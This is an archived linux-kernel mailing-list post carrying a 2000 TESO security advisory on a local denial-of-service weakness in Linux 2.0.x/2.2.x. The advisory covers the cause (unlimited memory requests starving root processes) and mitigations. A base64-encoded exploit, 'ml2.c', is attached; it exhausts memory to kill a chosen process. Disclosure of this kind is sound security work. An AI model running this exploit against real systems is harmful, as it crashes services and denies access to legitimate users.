Linux Kernel 2.0.x/2.2.x local Denial of Service attack

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Tigran Aivazian: "[patch] bug in 3c509 driver"
• Previous message: M.J. Galan: "Re: Announce: Intel EtherExpressPro100 driver update"
• Next in thread: Khimenko Victor: "Re: Linux Kernel 2.0.x/2.2.x local Denial of Service attack"
• Reply: Khimenko Victor: "Re: Linux Kernel 2.0.x/2.2.x local Denial of Service attack"
• Reply: Khimenko Victor: "Re: Linux Kernel 2.0.x/2.2.x local Denial of Service attack"
• Reply: Alexandre Hautequest: "Re: Linux Kernel 2.0.x/2.2.x local Denial of Service attack"

---1463811696-1983252646-947430291=:15243
Content-Type: TEXT/PLAIN; charset=US-ASCII

------

TESO Security Advisory
09/01/2000

Linux Kernel 2.0.x and 2.2.x local Denial of Service attack

Summary
===================

A weakness within the Linux 2.0.x and Linux 2.2.x kernels has been
discovered. The vulnerability allows any user without limits on the
system to crash arbitary processes, even those owned by the superuser.
Even system crashes can be experienced.

Systems Affected
===================

All systems running the kernel versions 2.0.x or 2.2.x of the Linux
operating system with local users who have no resource limits.
It is not enough to set special values only for the max. number of
processer per user ('forkbomb').
Linux 2.3.x systems may be affected, too, we didn't tested this versions.

Tests
===================

A system crash or the crash of particular processes can be reproduced
using the included exploit file "ml2.c", written by Stealth [3].
We've successfully managed to crash Linux 2.0.x and 2.2.x systems with
it.

Impact
===================

By crashing single processes or even crashing the whole system an attacker
may render the whole system unuseable to any other user (including
superuser) or selectivly kill only important processes, denying services
to legitimate use.

Explanation
===================

Any user can request a big amount of memory, 'stealing' required space for
important processes (syslogd, klogd, ...). Due to a lack of space, a
system-call of these processes that requires new space will fail. In
consequence this process will be killed by the kernel.
(see arch/{...}/mm/fault.c)

There should be a mechanism that protects a pool of memory for important
processes, which can only be accessed by the kernel itself or by processes
with (E)UID of 0.

The real bad thing in this is that unlimited resources are the default-case
and kernel happily gives away all the space to these unlimited processes.
In the kernel's eyes the process of luser foo has the same right/priority
for memory-requests as even init.

Solution
===================

Since the problem can only be exploited by users who already have local
access, the best way to prevent this and other local attacks is to give
only those users access that can be trusted.

However this problem is within the Linux kernel and can definitely be
fixed.
As a general advice the administrator should heavily use resource-limits
for all 'dangerous' parts such as max. numbers of processes, max. memory
etc.. Also programs such as [4] should be used on important systems to
prevent local DoS attacks.

The Linux kernel developers have been notified at the same time as the
public Linux community, so a safe patch should be available real soon.

Acknowledgments
================

The bugdiscovery and further analyzation was done by

S. Krahmer http://www.cs.uni-potsdam.de/homepages/students/linuxer

The exploit is due to

Stealth http://www.kalug.lug.net/stealth

This advisory has been written by scut and stealth.

Contact Information
===================

The teso crew can be reached by mailing to teso@shellcode.org.
Our webpage is at http://teso.scene.at/

"C-Skills" developers may be reached through [2].

References
===================

[1] TESO
http://teso.scene.at/

[2] S. Krahmer
http://www.cs.uni-potsdam.de/homepages/students/linuxer

[3] Stealth
http://www.kalug.lug.net/stealth/

[4] Fork Bomb Defuser
http://www.geocities.com/SiliconValley/Software/9197/rexfbd.htm

Disclaimer
===================

This advisory does not claim to be complete or to be usable for any
purpose. Especially information on the vulnerable systems may be
inaccurate or wrong. The supplied exploit is not to be used for malicious
purposes, but for educational purposes only.

This advisory is free for open distribution in unmodified form.
Articles that are based on information from this advisory should include
link [1] and [2].

Exploit
===================

We've created a working exploit to demonstrate the vulnerability.

The exploit is available on either

http://teso.scene.at/
or
http://www.cs.uni-potsdam.de/homepages/students/linuxer/

------

regards,
scut of teso

-- 
- scut@nb.in-berlin.de - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet  --
-- you don't need a lot of people to be great, you need a few great to be --
-- the best -----------------------------------------------------------------
--- nuclear arrival weapon spy agent remain undercover, hi echelon ----------

---1463811696-1983252646-947430291=:15243
Content-Type: TEXT/plain; name="ml2.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.05.10001091604510.15243@nb.in-berlin.de>
Content-Description: ml2.c
Content-Disposition: attachment; filename="ml2.c"

LyoNCiAqIENvcHlyaWdodCAoQykgMTk5OS8yMDAwIFN0ZWFsdGguDQogKiBB
bGwgcmlnaHRzIHJlc2VydmVkLg0KICoNCiAqIFJlZGlzdHJpYnV0aW9uIGFu
ZCB1c2UgaW4gc291cmNlIGFuZCBiaW5hcnkgZm9ybXMsIHdpdGggb3Igd2l0
aG91dA0KICogbW9kaWZpY2F0aW9uLCBhcmUgcGVybWl0dGVkIHByb3ZpZGVk
IHRoYXQgdGhlIGZvbGxvd2luZyBjb25kaXRpb25zDQogKiBhcmUgbWV0Og0K
ICogMS4gUmVkaXN0cmlidXRpb25zIG9mIHNvdXJjZSBjb2RlIG11c3QgcmV0
YWluIHRoZSBhYm92ZSBjb3B5cmlnaHQNCiAqICAgIG5vdGljZSwgdGhpcyBs
aXN0IG9mIGNvbmRpdGlvbnMgYW5kIHRoZSBmb2xsb3dpbmcgZGlzY2xhaW1l
ci4NCiAqIDIuIFJlZGlzdHJpYnV0aW9ucyBpbiBiaW5hcnkgZm9ybSBtdXN0
IHJlcHJvZHVjZSB0aGUgYWJvdmUgY29weXJpZ2h0DQogKiAgICBub3RpY2Us
IHRoaXMgbGlzdCBvZiBjb25kaXRpb25zIGFuZCB0aGUgZm9sbG93aW5nIGRp
c2NsYWltZXIgaW4gdGhlDQogKiAgICBkb2N1bWVudGF0aW9uIGFuZC9vciBv
dGhlciBtYXRlcmlhbHMgcHJvdmlkZWQgd2l0aCB0aGUgZGlzdHJpYnV0aW9u
Lg0KICogMy4gQWxsIGFkdmVydGlzaW5nIG1hdGVyaWFscyBtZW50aW9uaW5n
IGZlYXR1cmVzIG9yIHVzZSBvZiB0aGlzIHNvZnR3YXJlDQogKiAgICBtdXN0
IGRpc3BsYXkgdGhlIGZvbGxvd2luZyBhY2tub3dsZWRnZW1lbnQ6DQogKiAg
ICAgIFRoaXMgcHJvZHVjdCBpbmNsdWRlcyBzb2Z0d2FyZSBkZXZlbG9wZWQg
YnkgU3RlYWx0aC4NCiAqIDQuIFRoZSBuYW1lIFN0ZWFsdGggbWF5IG5vdCBi
ZSB1c2VkIHRvIGVuZG9yc2Ugb3IgcHJvbW90ZQ0KICogICAgcHJvZHVjdHMg
ZGVyaXZlZCBmcm9tIHRoaXMgc29mdHdhcmUgd2l0aG91dCBzcGVjaWZpYyBw
cmlvciB3cml0dGVuDQogKiAgICBwZXJtaXNzaW9uLg0KICoNCiAqIFRISVMg
U09GVFdBUkUgSVMgUFJPVklERUQgQlkgVEhFIEFVVEhPUiBgYEFTIElTJycg
QU5EIEFOWQ0KICogRVhQUkVTUyBPUiBJTVBMSUVEIFdBUlJBTlRJRVMsIElO
Q0xVRElORywgQlVUIE5PVCBMSU1JVEVEIFRPLCBUSEUNCiAqIElNUExJRUQg
V0FSUkFOVElFUyBPRiBNRVJDSEFOVEFCSUxJVFkgQU5EIEZJVE5FU1MgRk9S
IEEgUEFSVElDVUxBUiBQVVJQT1NFDQogKiBBUkUgRElTQ0xBSU1FRC4gIElO
IE5PIEVWRU5UIFNIQUxMIFRIRSBBVVRIT1IgQkUgTElBQkxFDQogKiBGT1Ig
QU5ZIERJUkVDVCwgSU5ESVJFQ1QsIElOQ0lERU5UQUwsIFNQRUNJQUwsIEVY
RU1QTEFSWSwgT1IgQ09OU0VRVUVOVElBTA0KICogREFNQUdFUyAoSU5DTFVE
SU5HLCBCVVQgTk9UIExJTUlURUQgVE8sIFBST0NVUkVNRU5UIE9GIFNVQlNU
SVRVVEUgR09PRFMNCiAqIE9SIFNFUlZJQ0VTOyBMT1NTIE9GIFVTRSwgREFU
QSwgT1IgUFJPRklUUzsgT1IgQlVTSU5FU1MgSU5URVJSVVBUSU9OKQ0KICog
SE9XRVZFUiBDQVVTRUQgQU5EIE9OIEFOWSBUSEVPUlkgT0YgTElBQklMSVRZ
LCBXSEVUSEVSIElOIENPTlRSQUNULCBTVFJJQ1QNCiAqIExJQUJJTElUWSwg
T1IgVE9SVCAoSU5DTFVESU5HIE5FR0xJR0VOQ0UgT1IgT1RIRVJXSVNFKSBB
UklTSU5HIElOIEFOWSBXQVkNCiAqIE9VVCBPRiBUSEUgVVNFIE9GIFRISVMg
U09GVFdBUkUsIEVWRU4gSUYgQURWSVNFRCBPRiBUSEUgUE9TU0lCSUxJVFkg
T0YNCiAqIFNVQ0ggREFNQUdFLg0KICovDQojaW5jbHVkZSA8c3RkaW8uaD4N
CiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNp
bmNsdWRlIDxzeXNsb2cuaD4NCg0KI2Vycm9yCQ0KDQovKioqICEhISBEQU5H
RVIgISEhDQogKioqIFRoaXMgcHJvZ3JhbSBtYXkgY3Jhc2ggeW91ciB3aG9s
ZSBzeXN0ZW0sIGNhdXNpbmcgZGFtYWdlIG9mIGFueSBraW5kLA0KICoqKiBl
dmVuIGRhdGEtbG9zcy4gU28gYmUgc3VyZSB3aGF0IHlvdSBkby4NCiAqKiov
DQoNCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikNCnsNCiAgIAlj
aGFyIGZvb1sxMDAwXTsNCiAgICAgICAgY2hhciBiaWdtc2dbMTAwMDBdOw0K
CWNoYXIgKnMsICpob2xkX3M7IA0KCWludCBpID0gMDsNCiAgICAgICAgDQog
ICAgICAgIG1lbXNldChiaWdtc2csICdYJywgc2l6ZW9mKGJpZ21zZyktMSk7
DQogICAJaWYgKGFyZ2MgPCAyKSB7DQogICAgICAgICAgIAlwcmludGYoInVz
YWdlOiAlcyA8cGlkIHRvIGtpbGw+XG4iLCBhcmd2WzBdKTsNCiAgICAgICAg
ICAgICAgICBleGl0KDEpOw0KICAgICAgICB9DQojaWYgMA0KCWZvcmsoKTsN
CiNlbmRpZg0KICAgICAgICBtZW1zZXQoZm9vLCAwLCBzaXplb2YoZm9vKSk7
DQogICAgICAgIHNucHJpbnRmKGZvbywgc2l6ZW9mKGZvbyksICIvcHJvYy8l
cy9zdGF0IiwgYXJndlsxXSk7DQogICAJDQoJLyogY2hlY2sgd2hldGhlciBw
cm9jZXNzIGlzIHN0aWxsIGFsaXZlICovDQoJd2hpbGUgKGFjY2Vzcyhmb28s
IEZfT0spID09IDApIHsNCiAgICAgICAgICAgCXMgPSBtYWxsb2MoMTAwMDAp
Ow0KCQlpZiAocyA9PSBOVUxMKSB7DQoJCQlpZiAoaG9sZF9zKQ0KCQkJCWZy
ZWUoaG9sZF9zKTsNCi8qCQkJaWYgKHMpDQoJCQkJc1tpJTEwMDAwXSA9IDA7
DQoqLwkJCXByaW50ZigiY3Jhc2hpbmcgLi4uIFxuIik7DQoJCQ0KCQkJLyog
Zm9yY2UgYSByb290LXByb2Nlc3MgdG8gcmVxdWlyZSBzb21lIG1lbW9yeSwg
c28gbWF5YmUNCgkJCSAqIGhlIGRpZXMgYmVmb3JlIHdlIGRpZS4gOikNCiAJ
CQkgKi8NCgkJCW9wZW5sb2coImIwMG0iLCAwLCAwKTsNCiAgICAgICAgCQlz
eXNsb2coMSwgYmlnbXNnKTsNCgkJCWNsb3NlbG9nKCk7DQoJCX0NCiAgICAg
ICAgICAgICAgICBwcmludGYoIiVkXHIiLCBpKyspOyBmZmx1c2goc3Rkb3V0
KTsNCgkJaG9sZF9zID0gczsNCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4g
MDsNCn0NCg0K
---1463811696-1983252646-947430291=:15243--

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

• Next message: Tigran Aivazian: "[patch] bug in 3c509 driver"
• Previous message: M.J. Galan: "Re: Announce: Intel EtherExpressPro100 driver update"
• Next in thread: Khimenko Victor: "Re: Linux Kernel 2.0.x/2.2.x local Denial of Service attack"
• Reply: Khimenko Victor: "Re: Linux Kernel 2.0.x/2.2.x local Denial of Service attack"
• Reply: Khimenko Victor: "Re: Linux Kernel 2.0.x/2.2.x local Denial of Service attack"
• Reply: Alexandre Hautequest: "Re: Linux Kernel 2.0.x/2.2.x local Denial of Service attack"